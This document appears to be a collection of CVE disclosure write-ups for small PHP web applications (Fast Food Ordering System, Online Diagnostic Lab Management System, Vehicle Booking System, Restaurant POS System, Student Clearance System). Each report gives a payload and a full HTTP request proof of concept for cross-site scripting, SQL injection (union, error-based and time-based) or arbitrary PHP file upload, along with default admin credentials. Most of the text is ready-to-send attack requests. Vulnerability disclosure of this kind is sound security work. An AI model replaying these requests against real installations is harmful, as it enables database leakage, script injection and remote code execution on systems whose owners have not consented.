A cross-site scripting (XSS) vulnerability in /fastfood/purchase.php of Fast Food Ordering System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the customer parameter.

**Vulnerability Description**

Fast Food Ordering System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the purchase.php. It is an open source project from campcodes.com. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the customer parameter.

1.  Vulnerability Submitter: Tr0e
    
2.  vendors: Fast Food Ordering System v1.0;
    
3.  The program is built using the xmapp/v3.3.0 and PHP/8.1.10 version;
    
4.  Vulnerability location: /fastfood/purchase.php
    

**Vulnerability Verification**

\[+\] Payload:

<script\>alert("XSS")</script\>

POC：

POST /fastfood/purchase.php HTTP/1.1
Host: 192.168.0.111:91
Content\-Length: 259
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.0.111:91
Content\-Type: application/x\-www\-form\-urlencoded
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed\-exchange;v\=b3;q\=0.9
Referer: http://192.168.0.111:91/fastfood/order.php
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9,en;q\=0.8
Cookie: PHPSESSID\=rbcvgagjbbad1bbrbb62nukgmc
Connection: close

quantity\_0\=&quantity\_1\=&quantity\_2\=&quantity\_3\=&quantity\_4\=&quantity\_5\=&quantity\_6\=&quantity\_7\=&quantity\_8\=&quantity\_9\=&quantity\_10\=&quantity\_11\=&productid%5B%5D\=23%7C%7C12&quantity\_12\=10&customer\=<script\>alert("XSS")</script\>

**How to verify**

Build the vulnerability environment according to the steps provided by the source code author and execute the Payload provided above.

The vulnerability is located at the "Order - Save" function, you shuold inserts Payload when you save order，as shown in the following figure：

CVE-2022-43082: CVE_Hunter/XSS-4.md at main · Tr0e/CVE_Hunter

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/tests/manage_test.php.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: 云影

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/admin/tests/manage\_test.php?id=

Vulnerability location: /odlms/admin/tests/manage\_test.php?id=,id

dbname=odlms\_db,length=8

\[+\] Payload: /odlms/admin/tests/manage\_test.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7,8--+ // Leak place ---> id

GET /odlms/admin/tests/manage\_test.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7,8\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

CVE-2022-43126: Cve_report/SQLi-1.md at master · vickysuper/Cve_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /appointments/update_status.php.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: 云影

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/admin/appointments/update\_status.php?id=

Vulnerability location: /odlms/admin/appointments/update\_status.php?id=,id

dbname=odlms\_db,length=8

\[+\] Payload: /odlms/admin/appointments/update\_status.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /odlms/admin/appointments/update\_status.php?id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

CVE-2022-43127: Cve_report/SQLi-4.md at master · vickysuper/Cve_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=user/manage_user.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: 云影

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/admin/?page=user/manage\_user&id=

Vulnerability location: /odlms/admin/?page=user/manage\_user&id=,id

dbname=odlms\_db,length=8

\[+\] Payload: /odlms/admin/?page=user/manage\_user&id=6%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /odlms/admin/?page\=user/manage\_user&id\=6%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

CVE-2022-43124: Cve_report/SQLi-2.md at master · vickysuper/Cve_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /appointments/manage_appointment.php.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: 云影

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/admin/appointments/manage\_appointment.php?id=

Vulnerability location: /odlms/admin/appointments/manage\_appointment.php?id=,id

dbname=odlms\_db,length=8

\[+\] Payload: /odlms/admin/appointments/manage\_appointment.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /odlms/admin/appointments/manage\_appointment.php?id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

CVE-2022-43125: Cve_report/SQLi-3.md at master · vickysuper/Cve_report

A cross-site scripting (XSS) vulnerability in admin-add-vehicle.php of Vehicle Booking System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the v_name parameter.

**Vulnerability Description**

Vehicle Booking System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the admin-add-vehicle.php. It is an open source project from https://codeastro.com/ . This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the v\_name parameter.

1.  Vulnerability Submitter: Tr0e
    
2.  vendors: Vehicle Booking System in PHP with Source Code - CodeAstro
    
3.  The program is built using the xmapp/v3.3.0 and PHP/8.1.10 version
    
4.  Vulnerability location: /VehicleBooking-PHP/admin/admin-add-vehicle.php
    

**Vulnerability Verification**

\[+\] Payload:

<script\>alert("XSS")</script\>

POC：

POST http://192.168.0.120:91/VehicleBooking-PHP/admin/admin-add-vehicle.php HTTP/1.1
Host: 192.168.0.120:91
Content\-Length: 905
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.0.120:91
Content\-Type: multipart/form\-data; boundary\=\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed\-exchange;v\=b3;q\=0.9
Referer: http://192.168.0.120:91/VehicleBooking-PHP/admin/admin-add-vehicle.php
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9,en;q\=0.8
Cookie: PHPSESSID\=ldi7mdlvm8g7bnfhunuvrhp8ne
Connection: close

\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_name"

<script\>alert("XSS")</script>
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_reg\_no"

aaa
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_pass\_no"

111
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_driver"

Demo User
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_category"

Bus
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_status"

Booked
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_dpic"; filename\="Tr0e.jpg"
Content\-Type: image/jpeg

123
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="add\_veh"

\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu\--

**How to verify**

1.  Build the vulnerability environment according to the steps provided by the source code author;
2.  log in to the background management system through the default account and password（Email: admin@mail.com Password: codeastro.com）;
3.  The vulnerability lies in the "Vehicles - Add - Add Vehicle" function, you should inserts Payload when you Add Vehicle, as shown in the following figure：

CVE-2022-43084: CVE_Hunter/XSS-5.md at main · Tr0e/CVE_Hunter

An arbitrary file upload vulnerability in admin-add-vehicle.php of Vehicle Booking System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.

**Vulnerability Description**

Arbitrary file upload vulnerability in Vehicle Booking System v1.0 allows attackers to execute arbitrary code via the file upload to admin-add-vehicle.php. It is an open source project from https://codeastro.com .

1.  Vulnerability Submitter: Tr0e
    
2.  vendors: Vehicle Booking System in PHP with Source Code - CodeAstro
    
3.  The program is built using the xmapp/v3.3.0 and PHP/8.1.10 version;
    
4.  Vulnerability location: /VehicleBooking-PHP/admin/admin-add-vehicle.php
    

**Vulnerability Verification**

\[+\] Payload:

POC：

POST http://192.168.0.120:91/VehicleBooking-PHP/admin/admin-add-vehicle.php HTTP/1.1
Host: 192.168.0.120:91
Content\-Length: 895
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.0.120:91
Content\-Type: multipart/form\-data; boundary\=\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed\-exchange;v\=b3;q\=0.9
Referer: http://192.168.0.120:91/VehicleBooking-PHP/admin/admin-add-vehicle.php
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9,en;q\=0.8
Cookie: PHPSESSID\=ldi7mdlvm8g7bnfhunuvrhp8ne
Connection: close

\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_name"

Test
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_reg\_no"

aaa
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_pass\_no"

111
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_driver"

Demo User
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_category"

Bus
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_status"

Booked
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_dpic"; filename\="Tr0e.php"
Content\-Type: image/jpeg

<?php phpinfo();?\>
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="add\_veh"

\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu\--

**How to verify**

1.  Build the vulnerability environment according to the steps provided by the source code author.
2.  log in to the background management system through the default account and password（Email: admin@mail.com Password: codeastro.com）;
3.  The vulnerability lies in the "Vehicles - Add - Add Vehicle" function, you should inserts Payload when you Add Vehicle, as shown in the following figure：

CVE-2022-43083: CVE_Hunter/RCE-2.md at main · Tr0e/CVE_Hunter

An arbitrary file upload vulnerability in add_product.php of Restaurant POS System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.

**Vulnerability Description**

Arbitrary file upload vulnerability in Restaurant POS System v1.0 allows attackers to execute arbitrary code via the file upload to add\_product.php. It is an open source project from https://codeastro.com .

1.  Vulnerability Submitter: Tr0e
    
2.  vendors: Restaurant POS System in PHP with Source Code - CodeAstro
    
3.  The program is built using the xmapp/v3.3.0 and PHP/8.1.10 version
    
4.  Vulnerability location: /RestaurantPOS/Restro/admin/add\_product.php
    

**Vulnerability Verification**

\[+\] Payload:

POC：

POST http://192.168.0.120:91/RestaurantPOS/Restro/admin/add\_product.php HTTP/1.1
Host: 192.168.0.120:91
Content\-Length: 826
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.0.120:91
Content\-Type: multipart/form\-data; boundary\=\--\--WebKitFormBoundarySsF9wyDdPINlRtc6
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed\-exchange;v\=b3;q\=0.9
Referer: http://192.168.0.120:91/RestaurantPOS/Restro/admin/add\_product.php
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9,en;q\=0.8
Cookie: PHPSESSID\=ldi7mdlvm8g7bnfhunuvrhp8ne
Connection: close

\--\--\--WebKitFormBoundarySsF9wyDdPINlRtc6
Content\-Disposition: form\-data; name\="prod\_name"

Test
\--\--\--WebKitFormBoundarySsF9wyDdPINlRtc6
Content\-Disposition: form\-data; name\="prod\_id"

f867c0fe4f
\--\--\--WebKitFormBoundarySsF9wyDdPINlRtc6
Content\-Disposition: form\-data; name\="prod\_code"

RFZN\-9372
\--\--\--WebKitFormBoundarySsF9wyDdPINlRtc6
Content\-Disposition: form\-data; name\="prod\_img"; filename\="Tr0e.php"
Content\-Type: image/jpeg

<?php phpinfo();?\>
\--\--\--WebKitFormBoundarySsF9wyDdPINlRtc6
Content\-Disposition: form\-data; name\="prod\_price"

100
\--\--\--WebKitFormBoundarySsF9wyDdPINlRtc6
Content\-Disposition: form\-data; name\="prod\_desc"

Tr0e Test
\--\--\--WebKitFormBoundarySsF9wyDdPINlRtc6
Content\-Disposition: form\-data; name\="addProduct"

Add Product
\--\--\--WebKitFormBoundarySsF9wyDdPINlRtc6\--

**How to verify**

1.  Build the vulnerability environment according to the steps provided by the source code author.
2.  log in to the "Admin Panel” through the default account and password（Email: admin@mail.com Password: codeastro.com）;
3.  The vulnerability lies in the "Products - Add New Product" function, you should inserts Payload when you add new product, as shown in the following figure：

CVE-2022-43085: CVE_Hunter/RCE-3.md at main · Tr0e/CVE_Hunter

Restaurant POS System v1.0 was discovered to contain a SQL injection vulnerability via update_customer.php.

**Vulnerability Description**

Restaurant POS System v1.0 was discovered to contain a SQL injection vulnerability via the update\_customer.php. It is an open source project from campcodes.com. This vulnerability can lead to database information leakage.

1.  Vulnerability Submitter: Tr0e
2.  vendors: Restaurant POS System in PHP with Source Code - CodeAstro
3.  The program is built using the xmapp/v3.3.0 and PHP/8.1.10 version;
4.  Vulnerability location: /RestaurantPOS/Restro/admin/update\_customer.php

**Vulnerability Verification**

\[+\] Payload:

test'and(select\*from(select+sleep(3))a/\*\*/union/\*\*/select+1)='

POC：

POST http://192.168.0.120:91/RestaurantPOS/Restro/admin/update\_customer.php?update=dac2ad667158'and(select\*from(select+sleep(3))a/\*\*/union/\*\*/select+1)=' HTTP/1.1
Host: 192.168.0.120:91
Content\-Length: 130
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.0.120:91
Content\-Type: application/x\-www\-form\-urlencoded
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed\-exchange;v\=b3;q\=0.9
Referer: http://192.168.0.120:91/RestaurantPOS/Restro/admin/update\_customer.php?update=dac2ad667158
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9,en;q\=0.8
Cookie: PHPSESSID\=ldi7mdlvm8g7bnfhunuvrhp8ne
Connection: close

customer\_name\=Yao&customer\_phoneno\=13011113333&customer\_email\=123%40qq.com&customer\_password\=123456&updateCustomer\=Update+Customer

**How to verify**

1.  Build the vulnerability environment according to the steps provided by the source code author ;
2.  log in to the "Admin Panel” through the default account and password（Email: admin@mail.com Password: codeastro.com）;
3.  The vulnerability is located at the "Customers - Update" function, you should inserts Payload when you Update any customer's information，as shown in the following figure：

CVE-2022-43086: CVE_Hunter/SQLi-4.md at main · Tr0e/CVE_Hunter

A cross-site scripting (XSS) vulnerability in /admin/edit-admin.php of Web-Based Student Clearance System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the txtemail parameter.

**Vulnerability Description**

Web-Based Student Clearance System in PHP Free Source Code v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the componentedit-admin.php. It is an open source project from https://www.sourcecodester.com/. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the txtemail parameter.

1.  BUG\_Author: Tr0e
    
2.  vendors: Web-Based Student Clearance System in PHP Free Source Code;
    
3.  The program is built using the xmapp/v3.3.0 and PHP/8.1.10 version;
    
4.  Vulnerability location: /student\_clearance\_system\_Aurthur\_Javis/admin/edit-admin.php
    

**Vulnerability Verification**

\[+\] Payload:

"><script>alert(1)</script>

POC：

POST http://192.168.0.111:91/student\_clearance\_system\_Aurthur\_Javis/admin/edit-admin.php?id=4 HTTP/1.1
Host: 192.168.0.111:91
Content\-Length: 486
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.0.111:91
Content\-Type: multipart/form\-data; boundary\=\--\--WebKitFormBoundaryZuvZCgQkb37Jezph
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed\-exchange;v\=b3;q\=0.9
Referer: http://192.168.0.111:91/student\_clearance\_system\_Aurthur\_Javis/admin/edit-admin.php?id=4
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9,en;q\=0.8
Cookie: PHPSESSID\=e8pdd3dv0b39d1h4vcj99q01cq
Connection: close

\--\--\--WebKitFormBoundaryZuvZCgQkb37Jezph
Content\-Disposition: form\-data; name\="txtfullname"

EKE, EMMANUEL EFA\-EVAL
\--\--\--WebKitFormBoundaryZuvZCgQkb37Jezph
Content\-Disposition: form\-data; name\="txtemail"

"><script>alert(1)</script>
\------WebKitFormBoundaryZuvZCgQkb37Jezph
Content-Disposition: form-data; name="cmddesignation"
Admin
\------WebKitFormBoundaryZuvZCgQkb37Jezph
Content-Disposition: form-data; name="btnedit"


------WebKitFormBoundaryZuvZCgQkb37Jezph--

**How to verify**

Build the vulnerability environment according to the steps provided by the source code author (Log in with the default account and password:admin/admin123) and execute the Payload provided above.

The vulnerability lies in the "User Manager - User Record - Action - Edit" function, you shuold inserts Payload when editing administrator user information，as shown in the following figure：

Tag

#php